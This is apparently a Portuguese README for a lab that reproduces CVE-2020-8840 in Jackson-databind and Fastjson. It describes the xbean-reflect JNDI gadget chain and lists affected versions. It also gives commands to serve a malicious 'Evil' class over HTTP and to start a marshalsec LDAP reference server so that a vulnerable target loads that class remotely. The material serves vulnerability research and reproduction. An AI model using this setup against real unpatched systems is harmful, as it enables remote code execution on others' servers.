
Jackson-databind vulnerabilidade de execução remota de código (CVE-2020-8840) código do ambiente de análise e reprodução
Código de análise e reprodução do ambiente da vulnerabilidade de execução remota de código do Jackson-databind (CVE-2020-8840).
O projeto inclui:
jackson-databind e Fastjsonmarshalsec-0.0.3-SNAPSHOT-all.jar compiladoA vulnerabilidade de execução remota de código do Jackson-databind (CVE-2020-8840) permite que um atacante utilize a cadeia de exploração xbean-reflect (org.apache.xbean.propertyeditor.JndiConverter) para acionar o carregamento remoto de classes JNDI, alcançando assim a execução remota de código.
Esta vulnerabilidade também afeta algumas versões do jackson-databind e do Fastjson.
Versões afetadas: 2.0.0 <= FasterXML jackson-databind <= 2.9.10.2

O serviço LDAP referido no código de exemplo precisa ser configurado por conta própria.
WebServer
Inicie o serviço HTTP e armazene a classe maliciosa (o projeto inclui a classe Evil.java)
python -m http.server 2222

Serviço LDAP
Baixe a ferramenta Marshalsec, compile-a para um jar, inicie o serviço LDAP e defina o endereço codebase (o WebServer que armazena a classe maliciosa).
Para maior comodidade, evitando o download e compilação, o projeto também inclui o marshalsec-0.0.3-SNAPSHOT-all.jar (o código do projeto é pequeno, o tamanho grande se deve principalmente a este arquivo), compilado com JDK8.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:2222/#Evil

Versões afetadas: Fastjson <= 1.2.62
O ambiente de reprodução é o mesmo descrito acima; monte e inicie o WebServer e o serviço LDAP por conta própria.
